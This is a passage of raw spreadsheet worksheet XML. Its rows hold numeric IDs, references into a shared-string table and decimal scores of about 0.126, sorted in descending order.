    <row r="11919" ht="15.75" customHeight="1">
      <c r="A11919" s="1">
        <v>28702.0</v>
      </c>
      <c r="B11919" s="2">
        <v>2.7741948E7</v>
      </c>
      <c r="C11919" s="2" t="s">
        <v>11444</v>
      </c>
      <c r="D11919" s="2">
        <v>1.0</v>
      </c>
      <c r="E11919" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11919" s="2">
        <v>0.1268656716417911</v>
      </c>
    </row>
    <row r="11920" ht="15.75" customHeight="1">
      <c r="A11920" s="1">
        <v>18337.0</v>
      </c>
      <c r="B11920" s="2">
        <v>5.2421383E7</v>
      </c>
      <c r="C11920" s="2" t="s">
        <v>11445</v>
      </c>
      <c r="D11920" s="2">
        <v>1.0</v>
      </c>
      <c r="E11920" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11920" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="11921" ht="15.75" customHeight="1">
      <c r="A11921" s="1">
        <v>12633.0</v>
      </c>
      <c r="B11921" s="2">
        <v>3.0284046E7</v>
      </c>
      <c r="C11921" s="2" t="s">
        <v>11446</v>
      </c>
      <c r="D11921" s="2">
        <v>1.0</v>
      </c>
      <c r="E11921" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11921" s="2">
        <v>0.1266339869281046</v>
      </c>
    </row>
    <row r="11922" ht="15.75" customHeight="1">
      <c r="A11922" s="1">
        <v>4801.0</v>
      </c>
      <c r="B11922" s="2">
        <v>4.3514235E7</v>
      </c>
      <c r="C11922" s="2" t="s">
        <v>11447</v>
      </c>
      <c r="D11922" s="2">
        <v>1.0</v>
      </c>
      <c r="E11922" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11922" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="11923" ht="15.75" customHeight="1">
      <c r="A11923" s="1">
        <v>19514.0</v>
      </c>
      <c r="B11923" s="2">
        <v>5.594625E7</v>
      </c>
      <c r="C11923" s="2" t="s">
        <v>11448</v>
      </c>
      <c r="D11923" s="2">
        <v>1.0</v>
      </c>
      <c r="E11923" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11923" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="11924" ht="15.75" customHeight="1">
      <c r="A11924" s="1">
        <v>26079.0</v>
      </c>
      <c r="B11924" s="2">
        <v>1.563552E7</v>
      </c>
      <c r="C11924" s="2" t="s">
        <v>11449</v>
      </c>
      <c r="D11924" s="2">
        <v>1.0</v>
      </c>
      <c r="E11924" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11924" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="11925" ht="15.75" customHeight="1">
      <c r="A11925" s="1">
        <v>7478.0</v>
      </c>
      <c r="B11925" s="2">
        <v>5.1333835E7</v>
      </c>
      <c r="C11925" s="2" t="s">
        <v>11450</v>
      </c>
      <c r="D11925" s="2">
        <v>1.0</v>
      </c>
      <c r="E11925" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11925" s="2">
        <v>0.1262626262626263</v>
      </c>
    </row>
    <row r="11926" ht="15.75" customHeight="1">
      <c r="A11926" s="1">
        <v>7826.0</v>
      </c>
      <c r="B11926" s="2">
        <v>5.2311677E7</v>
      </c>
      <c r="C11926" s="2" t="s">
        <v>11451</v>
      </c>
      <c r="D11926" s="2">
        <v>1.0</v>
      </c>
      <c r="E11926" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11926" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="11927" ht="15.75" customHeight="1">
      <c r="A11927" s="1">
        <v>10636.0</v>
      </c>
      <c r="B11927" s="2">
        <v>1.407211E7</v>
      </c>
      <c r="C11927" s="2" t="s">
        <v>11452</v>
      </c>
      <c r="D11927" s="2">
        <v>1.0</v>
      </c>
      <c r="E11927" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11927" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="11928" ht="15.75" customHeight="1">
      <c r="A11928" s="1">
        <v>14307.0</v>
      </c>
      <c r="B11928" s="2">
        <v>3.8625921E7</v>
      </c>
      <c r="C11928" s="2" t="s">
        <v>11453</v>
      </c>
      <c r="D11928" s="2">
        <v>1.0</v>
      </c>
      <c r="E11928" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11928" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="11929" ht="15.75" customHeight="1">
      <c r="A11929" s="1">
        <v>17504.0</v>
      </c>
      <c r="B11929" s="2">
        <v>5.0005842E7</v>
      </c>
      <c r="C11929" s="2" t="s">
        <v>11454</v>
      </c>
      <c r="D11929" s="2">
        <v>1.0</v>
      </c>
      <c r="E11929" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11929" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="11930" ht="15.75" customHeight="1">
      <c r="A11930" s="1">
        <v>18174.0</v>
      </c>
      <c r="B11930" s="2">
        <v>5.1963771E7</v>
      </c>
      <c r="C11930" s="2" t="s">
        <v>11455</v>
      </c>
      <c r="D11930" s="2">
        <v>1.0</v>
      </c>
      <c r="E11930" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11930" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="11931" ht="15.75" customHeight="1">
      <c r="A11931" s="1">
        <v>28401.0</v>
      </c>
      <c r="B11931" s="2">
        <v>2.6283067E7</v>
      </c>
      <c r="C11931" s="2" t="s">
        <v>11456</v>
      </c>
      <c r="D11931" s="2">
        <v>1.0</v>
      </c>
      <c r="E11931" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11931" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="11932" ht="15.75" customHeight="1">
      <c r="A11932" s="1">
        <v>9737.0</v>
      </c>
      <c r="B11932" s="2">
        <v>5.6451937E7</v>
      </c>
      <c r="C11932" s="2" t="s">
        <v>11457</v>
      </c>
      <c r="D11932" s="2">
        <v>1.0</v>
      </c>
      <c r="E11932" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11932" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="11933" ht="15.75" customHeight="1">
      <c r="A11933" s="1">
        <v>7541.0</v>
      </c>
      <c r="B11933" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C11933" s="2" t="s">
        <v>11458</v>
      </c>
      <c r="D11933" s="2">
        <v>1.0</v>
      </c>
      <c r="E11933" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11933" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="11934" ht="15.75" customHeight="1">
      <c r="A11934" s="1">
        <v>8557.0</v>
      </c>
      <c r="B11934" s="2">
        <v>5.4164878E7</v>
      </c>
      <c r="C11934" s="2" t="s">
        <v>11459</v>
      </c>
      <c r="D11934" s="2">
        <v>1.0</v>
      </c>
      <c r="E11934" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11934" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="11935" ht="15.75" customHeight="1">
      <c r="A11935" s="1">
        <v>13636.0</v>
      </c>
      <c r="B11935" s="2">
        <v>3.5910179E7</v>
      </c>
      <c r="C11935" s="2" t="s">
        <v>11460</v>
      </c>
      <c r="D11935" s="2">
        <v>1.0</v>
      </c>
      <c r="E11935" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11935" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="11936" ht="15.75" customHeight="1">
      <c r="A11936" s="1">
        <v>16079.0</v>
      </c>
      <c r="B11936" s="2">
        <v>4.5355889E7</v>
      </c>
      <c r="C11936" s="2" t="s">
        <v>11461</v>
      </c>
      <c r="D11936" s="2">
        <v>1.0</v>
      </c>
      <c r="E11936" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11936" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="11937" ht="15.75" customHeight="1">
      <c r="A11937" s="1">
        <v>17977.0</v>
      </c>
      <c r="B11937" s="2">
        <v>5.1367003E7</v>
      </c>
      <c r="C11937" s="2" t="s">
        <v>11462</v>
      </c>
      <c r="D11937" s="2">
        <v>1.0</v>
      </c>
      <c r="E11937" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11937" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="11938" ht="15.75" customHeight="1">
      <c r="A11938" s="1">
        <v>32390.0</v>
      </c>
      <c r="B11938" s="2">
        <v>5621988.0</v>
      </c>
      <c r="C11938" s="2" t="s">
        <v>11463</v>
      </c>
      <c r="D11938" s="2">
        <v>1.0</v>
      </c>
      <c r="E11938" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11938" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="11939" ht="15.75" customHeight="1">
      <c r="A11939" s="1">
        <v>33192.0</v>
      </c>
      <c r="B11939" s="2">
        <v>7133785.0</v>
      </c>
      <c r="C11939" s="2" t="s">
        <v>11464</v>
      </c>
      <c r="D11939" s="2">
        <v>1.0</v>
      </c>
      <c r="E11939" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11939" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="11940" ht="15.75" customHeight="1">
      <c r="A11940" s="1">
        <v>33339.0</v>
      </c>
      <c r="B11940" s="2">
        <v>7593826.0</v>
      </c>
      <c r="C11940" s="2" t="s">
        <v>11465</v>
      </c>
      <c r="D11940" s="2">
        <v>1.0</v>
      </c>
      <c r="E11940" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11940" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="11941" ht="15.75" customHeight="1">
      <c r="A11941" s="1">
        <v>10187.0</v>
      </c>
      <c r="B11941" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C11941" s="2" t="s">
        <v>11466</v>
      </c>
      <c r="D11941" s="2">
        <v>1.0</v>
      </c>
      <c r="E11941" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11941" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="11942" ht="15.75" customHeight="1">
      <c r="A11942" s="1">
        <v>30268.0</v>
      </c>
      <c r="B11942" s="2">
        <v>3.7685835E7</v>
      </c>
      <c r="C11942" s="2" t="s">
        <v>11467</v>
      </c>
      <c r="D11942" s="2">
        <v>1.0</v>
      </c>
      <c r="E11942" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11942" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="11943" ht="15.75" customHeight="1">
      <c r="A11943" s="1">
        <v>31531.0</v>
      </c>
      <c r="B11943" s="2">
        <v>5.0929075E7</v>
      </c>
      <c r="C11943" s="2" t="s">
        <v>11468</v>
      </c>
      <c r="D11943" s="2">
        <v>1.0</v>
      </c>
      <c r="E11943" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11943" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="11944" ht="15.75" customHeight="1">
      <c r="A11944" s="1">
        <v>34104.0</v>
      </c>
      <c r="B11944" s="2">
        <v>9701813.0</v>
      </c>
      <c r="C11944" s="2" t="s">
        <v>11434</v>
      </c>
      <c r="D11944" s="2">
        <v>1.0</v>
      </c>
      <c r="E11944" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11944" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="11945" ht="15.75" customHeight="1">
      <c r="A11945" s="1">
        <v>24902.0</v>
      </c>
      <c r="B11945" s="2">
        <v>1.2308538E7</v>
      </c>
      <c r="C11945" s="2" t="s">
        <v>11469</v>
      </c>
      <c r="D11945" s="2">
        <v>1.0</v>
      </c>
      <c r="E11945" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11945" s="2">
        <v>0.1257716049382717</v>
      </c>
    </row>
    <row r="11946" ht="15.75" customHeight="1">
      <c r="A11946" s="1">
        <v>2617.0</v>
      </c>
      <c r="B11946" s="2">
        <v>3.4474513E7</v>
      </c>
      <c r="C11946" s="2" t="s">
        <v>11470</v>
      </c>
      <c r="D11946" s="2">
        <v>1.0</v>
      </c>
      <c r="E11946" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11946" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11947" ht="15.75" customHeight="1">
      <c r="A11947" s="1">
        <v>2886.0</v>
      </c>
      <c r="B11947" s="2">
        <v>3.5693403E7</v>
      </c>
      <c r="C11947" s="2" t="s">
        <v>11471</v>
      </c>
      <c r="D11947" s="2">
        <v>1.0</v>
      </c>
      <c r="E11947" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11947" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11948" ht="15.75" customHeight="1">
      <c r="A11948" s="1">
        <v>2951.0</v>
      </c>
      <c r="B11948" s="2">
        <v>3.6003491E7</v>
      </c>
      <c r="C11948" s="2" t="s">
        <v>11472</v>
      </c>
      <c r="D11948" s="2">
        <v>1.0</v>
      </c>
      <c r="E11948" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11948" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11949" ht="15.75" customHeight="1">
      <c r="A11949" s="1">
        <v>3191.0</v>
      </c>
      <c r="B11949" s="2">
        <v>3.7218528E7</v>
      </c>
      <c r="C11949" s="2" t="s">
        <v>11473</v>
      </c>
      <c r="D11949" s="2">
        <v>1.0</v>
      </c>
      <c r="E11949" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11949" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11950" ht="15.75" customHeight="1">
      <c r="A11950" s="1">
        <v>3670.0</v>
      </c>
      <c r="B11950" s="2">
        <v>3.9418998E7</v>
      </c>
      <c r="C11950" s="2" t="s">
        <v>11474</v>
      </c>
      <c r="D11950" s="2">
        <v>1.0</v>
      </c>
      <c r="E11950" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11950" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11951" ht="15.75" customHeight="1">
      <c r="A11951" s="1">
        <v>3864.0</v>
      </c>
      <c r="B11951" s="2">
        <v>4.0329895E7</v>
      </c>
      <c r="C11951" s="2" t="s">
        <v>11475</v>
      </c>
      <c r="D11951" s="2">
        <v>1.0</v>
      </c>
      <c r="E11951" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11951" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11952" ht="15.75" customHeight="1">
      <c r="A11952" s="1">
        <v>4656.0</v>
      </c>
      <c r="B11952" s="2">
        <v>4.3117754E7</v>
      </c>
      <c r="C11952" s="2" t="s">
        <v>11476</v>
      </c>
      <c r="D11952" s="2">
        <v>1.0</v>
      </c>
      <c r="E11952" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11952" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11953" ht="15.75" customHeight="1">
      <c r="A11953" s="1">
        <v>6125.0</v>
      </c>
      <c r="B11953" s="2">
        <v>4.7792019E7</v>
      </c>
      <c r="C11953" s="2" t="s">
        <v>11477</v>
      </c>
      <c r="D11953" s="2">
        <v>1.0</v>
      </c>
      <c r="E11953" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11953" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11954" ht="15.75" customHeight="1">
      <c r="A11954" s="1">
        <v>7226.0</v>
      </c>
      <c r="B11954" s="2">
        <v>5.0656698E7</v>
      </c>
      <c r="C11954" s="2" t="s">
        <v>11478</v>
      </c>
      <c r="D11954" s="2">
        <v>1.0</v>
      </c>
      <c r="E11954" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11954" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11955" ht="15.75" customHeight="1">
      <c r="A11955" s="1">
        <v>7451.0</v>
      </c>
      <c r="B11955" s="2">
        <v>5.1235362E7</v>
      </c>
      <c r="C11955" s="2" t="s">
        <v>11479</v>
      </c>
      <c r="D11955" s="2">
        <v>1.0</v>
      </c>
      <c r="E11955" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11955" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11956" ht="15.75" customHeight="1">
      <c r="A11956" s="1">
        <v>7814.0</v>
      </c>
      <c r="B11956" s="2">
        <v>5.2272412E7</v>
      </c>
      <c r="C11956" s="2" t="s">
        <v>11480</v>
      </c>
      <c r="D11956" s="2">
        <v>1.0</v>
      </c>
      <c r="E11956" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11956" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11957" ht="15.75" customHeight="1">
      <c r="A11957" s="1">
        <v>8004.0</v>
      </c>
      <c r="B11957" s="2">
        <v>5.2784081E7</v>
      </c>
      <c r="C11957" s="2" t="s">
        <v>11481</v>
      </c>
      <c r="D11957" s="2">
        <v>1.0</v>
      </c>
      <c r="E11957" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11957" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11958" ht="15.75" customHeight="1">
      <c r="A11958" s="1">
        <v>8958.0</v>
      </c>
      <c r="B11958" s="2">
        <v>5.4924984E7</v>
      </c>
      <c r="C11958" s="2" t="s">
        <v>11482</v>
      </c>
      <c r="D11958" s="2">
        <v>1.0</v>
      </c>
      <c r="E11958" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11958" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11959" ht="15.75" customHeight="1">
      <c r="A11959" s="1">
        <v>9046.0</v>
      </c>
      <c r="B11959" s="2">
        <v>5.505795E7</v>
      </c>
      <c r="C11959" s="2" t="s">
        <v>11483</v>
      </c>
      <c r="D11959" s="2">
        <v>1.0</v>
      </c>
      <c r="E11959" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11959" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11960" ht="15.75" customHeight="1">
      <c r="A11960" s="1">
        <v>9209.0</v>
      </c>
      <c r="B11960" s="2">
        <v>5.5414198E7</v>
      </c>
      <c r="C11960" s="2" t="s">
        <v>11484</v>
      </c>
      <c r="D11960" s="2">
        <v>1.0</v>
      </c>
      <c r="E11960" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11960" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11961" ht="15.75" customHeight="1">
      <c r="A11961" s="1">
        <v>9993.0</v>
      </c>
      <c r="B11961" s="2">
        <v>5.6981779E7</v>
      </c>
      <c r="C11961" s="2" t="s">
        <v>11485</v>
      </c>
      <c r="D11961" s="2">
        <v>1.0</v>
      </c>
      <c r="E11961" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11961" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11962" ht="15.75" customHeight="1">
      <c r="A11962" s="1">
        <v>10331.0</v>
      </c>
      <c r="B11962" s="2">
        <v>5.7716955E7</v>
      </c>
      <c r="C11962" s="2" t="s">
        <v>11486</v>
      </c>
      <c r="D11962" s="2">
        <v>1.0</v>
      </c>
      <c r="E11962" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11962" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11963" ht="15.75" customHeight="1">
      <c r="A11963" s="1">
        <v>12482.0</v>
      </c>
      <c r="B11963" s="2">
        <v>2.9499905E7</v>
      </c>
      <c r="C11963" s="2" t="s">
        <v>11487</v>
      </c>
      <c r="D11963" s="2">
        <v>1.0</v>
      </c>
      <c r="E11963" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11963" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11964" ht="15.75" customHeight="1">
      <c r="A11964" s="1">
        <v>12560.0</v>
      </c>
      <c r="B11964" s="2">
        <v>2.9916386E7</v>
      </c>
      <c r="C11964" s="2" t="s">
        <v>11488</v>
      </c>
      <c r="D11964" s="2">
        <v>1.0</v>
      </c>
      <c r="E11964" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11964" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11965" ht="15.75" customHeight="1">
      <c r="A11965" s="1">
        <v>14428.0</v>
      </c>
      <c r="B11965" s="2">
        <v>3.926164E7</v>
      </c>
      <c r="C11965" s="2" t="s">
        <v>11489</v>
      </c>
      <c r="D11965" s="2">
        <v>1.0</v>
      </c>
      <c r="E11965" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11965" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11966" ht="15.75" customHeight="1">
      <c r="A11966" s="1">
        <v>14430.0</v>
      </c>
      <c r="B11966" s="2">
        <v>3.926164E7</v>
      </c>
      <c r="C11966" s="2" t="s">
        <v>11489</v>
      </c>
      <c r="D11966" s="2">
        <v>1.0</v>
      </c>
      <c r="E11966" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11966" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11967" ht="15.75" customHeight="1">
      <c r="A11967" s="1">
        <v>14778.0</v>
      </c>
      <c r="B11967" s="2">
        <v>4.088182E7</v>
      </c>
      <c r="C11967" s="2" t="s">
        <v>11490</v>
      </c>
      <c r="D11967" s="2">
        <v>1.0</v>
      </c>
      <c r="E11967" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11967" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11968" ht="15.75" customHeight="1">
      <c r="A11968" s="1">
        <v>15304.0</v>
      </c>
      <c r="B11968" s="2">
        <v>4.2479222E7</v>
      </c>
      <c r="C11968" s="2" t="s">
        <v>11491</v>
      </c>
      <c r="D11968" s="2">
        <v>1.0</v>
      </c>
      <c r="E11968" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11968" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11969" ht="15.75" customHeight="1">
      <c r="A11969" s="1">
        <v>15397.0</v>
      </c>
      <c r="B11969" s="2">
        <v>4.2823027E7</v>
      </c>
      <c r="C11969" s="2" t="s">
        <v>11492</v>
      </c>
      <c r="D11969" s="2">
        <v>1.0</v>
      </c>
      <c r="E11969" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11969" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11970" ht="15.75" customHeight="1">
      <c r="A11970" s="1">
        <v>16668.0</v>
      </c>
      <c r="B11970" s="2">
        <v>4.7269732E7</v>
      </c>
      <c r="C11970" s="2" t="s">
        <v>11493</v>
      </c>
      <c r="D11970" s="2">
        <v>1.0</v>
      </c>
      <c r="E11970" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11970" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11971" ht="15.75" customHeight="1">
      <c r="A11971" s="1">
        <v>16794.0</v>
      </c>
      <c r="B11971" s="2">
        <v>4.7763899E7</v>
      </c>
      <c r="C11971" s="2" t="s">
        <v>11494</v>
      </c>
      <c r="D11971" s="2">
        <v>1.0</v>
      </c>
      <c r="E11971" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11971" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11972" ht="15.75" customHeight="1">
      <c r="A11972" s="1">
        <v>16960.0</v>
      </c>
      <c r="B11972" s="2">
        <v>4.8257385E7</v>
      </c>
      <c r="C11972" s="2" t="s">
        <v>11495</v>
      </c>
      <c r="D11972" s="2">
        <v>1.0</v>
      </c>
      <c r="E11972" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11972" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11973" ht="15.75" customHeight="1">
      <c r="A11973" s="1">
        <v>17850.0</v>
      </c>
      <c r="B11973" s="2">
        <v>5.0984021E7</v>
      </c>
      <c r="C11973" s="2" t="s">
        <v>11496</v>
      </c>
      <c r="D11973" s="2">
        <v>1.0</v>
      </c>
      <c r="E11973" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11973" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11974" ht="15.75" customHeight="1">
      <c r="A11974" s="1">
        <v>17859.0</v>
      </c>
      <c r="B11974" s="2">
        <v>5.0991301E7</v>
      </c>
      <c r="C11974" s="2" t="s">
        <v>11497</v>
      </c>
      <c r="D11974" s="2">
        <v>1.0</v>
      </c>
      <c r="E11974" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11974" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11975" ht="15.75" customHeight="1">
      <c r="A11975" s="1">
        <v>18067.0</v>
      </c>
      <c r="B11975" s="2">
        <v>5.1608807E7</v>
      </c>
      <c r="C11975" s="2" t="s">
        <v>11498</v>
      </c>
      <c r="D11975" s="2">
        <v>1.0</v>
      </c>
      <c r="E11975" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11975" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11976" ht="15.75" customHeight="1">
      <c r="A11976" s="1">
        <v>18097.0</v>
      </c>
      <c r="B11976" s="2">
        <v>5.1701427E7</v>
      </c>
      <c r="C11976" s="2" t="s">
        <v>11499</v>
      </c>
      <c r="D11976" s="2">
        <v>1.0</v>
      </c>
      <c r="E11976" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11976" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11977" ht="15.75" customHeight="1">
      <c r="A11977" s="1">
        <v>18214.0</v>
      </c>
      <c r="B11977" s="2">
        <v>5.2079926E7</v>
      </c>
      <c r="C11977" s="2" t="s">
        <v>11500</v>
      </c>
      <c r="D11977" s="2">
        <v>1.0</v>
      </c>
      <c r="E11977" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11977" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11978" ht="15.75" customHeight="1">
      <c r="A11978" s="1">
        <v>18293.0</v>
      </c>
      <c r="B11978" s="2">
        <v>5.2303128E7</v>
      </c>
      <c r="C11978" s="2" t="s">
        <v>11501</v>
      </c>
      <c r="D11978" s="2">
        <v>1.0</v>
      </c>
      <c r="E11978" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11978" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11979" ht="15.75" customHeight="1">
      <c r="A11979" s="1">
        <v>18465.0</v>
      </c>
      <c r="B11979" s="2">
        <v>5.2836329E7</v>
      </c>
      <c r="C11979" s="2" t="s">
        <v>11502</v>
      </c>
      <c r="D11979" s="2">
        <v>1.0</v>
      </c>
      <c r="E11979" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11979" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11980" ht="15.75" customHeight="1">
      <c r="A11980" s="1">
        <v>18577.0</v>
      </c>
      <c r="B11980" s="2">
        <v>5.3243216E7</v>
      </c>
      <c r="C11980" s="2" t="s">
        <v>11503</v>
      </c>
      <c r="D11980" s="2">
        <v>1.0</v>
      </c>
      <c r="E11980" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11980" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11981" ht="15.75" customHeight="1">
      <c r="A11981" s="1">
        <v>18693.0</v>
      </c>
      <c r="B11981" s="2">
        <v>5.3601082E7</v>
      </c>
      <c r="C11981" s="2" t="s">
        <v>11504</v>
      </c>
      <c r="D11981" s="2">
        <v>1.0</v>
      </c>
      <c r="E11981" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11981" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11982" ht="15.75" customHeight="1">
      <c r="A11982" s="1">
        <v>18747.0</v>
      </c>
      <c r="B11982" s="2">
        <v>5.3759721E7</v>
      </c>
      <c r="C11982" s="2" t="s">
        <v>11505</v>
      </c>
      <c r="D11982" s="2">
        <v>1.0</v>
      </c>
      <c r="E11982" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11982" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11983" ht="15.75" customHeight="1">
      <c r="A11983" s="1">
        <v>19541.0</v>
      </c>
      <c r="B11983" s="2">
        <v>5.6030506E7</v>
      </c>
      <c r="C11983" s="2" t="s">
        <v>11506</v>
      </c>
      <c r="D11983" s="2">
        <v>1.0</v>
      </c>
      <c r="E11983" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11983" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11984" ht="15.75" customHeight="1">
      <c r="A11984" s="1">
        <v>19747.0</v>
      </c>
      <c r="B11984" s="2">
        <v>5.6699282E7</v>
      </c>
      <c r="C11984" s="2" t="s">
        <v>11507</v>
      </c>
      <c r="D11984" s="2">
        <v>1.0</v>
      </c>
      <c r="E11984" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11984" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="11985" ht="15.75" customHeight="1">
      <c r="A11985" s="1">
        <v>22126.0</v>
      </c>
      <c r="B11985" s="2">
        <v>3.1011406E7</v>
      </c>
      <c r="C11985" s="2" t="s">
        <v>11508</v>
      </c>
      <c r="D11985" s="2">
        <v>1.0</v>
      </c>
      <c r="E11985" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11985" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
